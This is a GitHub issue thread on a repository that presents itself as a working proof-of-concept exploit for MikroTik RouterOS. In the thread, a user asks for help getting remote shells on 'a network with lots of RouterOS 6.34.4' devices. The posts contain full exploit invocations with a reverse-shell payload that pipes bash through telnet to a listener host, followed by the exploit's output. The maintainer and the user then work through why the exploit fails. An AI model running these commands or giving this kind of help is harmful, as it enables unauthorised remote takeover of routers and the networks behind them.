BigNerd95 / Chimay-Red

Working POC of Mikrotik exploit from Vault 7 CIA Leaks
655 stars 217 forks

Netcat or meterpreter won't connect!!! #51

Open Husseo19 opened 6 years ago

Husseo19 commented 6 years ago

Hey man, I am on a network with lots of RouterOS 6.34.4. Tried your scripts but can't get a connection through either Netcat or meterpreter! I first used the x86 binary file and stackclashx86.

python StackClash_x86.py 18.10.0.170 80 www_binary_x86 "/bin/mknod /ram/f p; /bin/telnet 192.168.1.105 4444 < /ram/f | /bin/bash > /ram/f 2>&1"
Building ROP chain...
[+] Binary loaded
[+] Loading gadgets, please wait...
[+] Gadgets loaded !
The ROP chain is 1912 bytes long (32768 bytes available)
Crash...
Connected
Sent
Sent
Opening 2 sockets
Connected
Connected
Stack clash...
Sent
Sent
Sent
Sending payload
Sent
Starting exploit
Done!

Netcat doesn't respond. Tips?

P.S. I tried the mips versions with the corresponding mips scripts. It won't work, so I assume the device isn't mipsbe arch? Here is what I got.

python StackClash_mips.py 18.10.0.170 80 www_binary_mips "/bin/mknod /ram/f p; /bin/telnet 192.168.1.105 4444 < /ram/f | /bin/bash > /ram/f 2>&1"
Building shellcode + ROP chain...
Traceback (most recent call last):
  File "StackClash_mips.py", line 258, in
    payload = build_payload(binRop, shellCmd)
  File "StackClash_mips.py", line 140, in build_payload
    shell_code = build_shellcode(shellCmd)
  File "StackClash_mips.py", line 93, in build_shellcode
    shellCmd = bytes(shellCmd, "ascii")
TypeError: str() takes at most 1 argument (2 given)

Thanks in advance!

BigNerd95 commented 6 years ago

You have to use python3 with stackclash mips. Anyway, if you have direct access to these boards, you can check the arch with MNDP.

Husseo19 commented 6 years ago

Thanks for the answer, but why is it that I don't get any kind of response after executing? It says the payload is sent, and the exploit starts, but nothing happens after that! I tried your script from exploit_db as well. Thanks again :)

JburkeRSAC commented 5 years ago

I get the same issues regardless of using python3 with the mipsbe build or python with x86.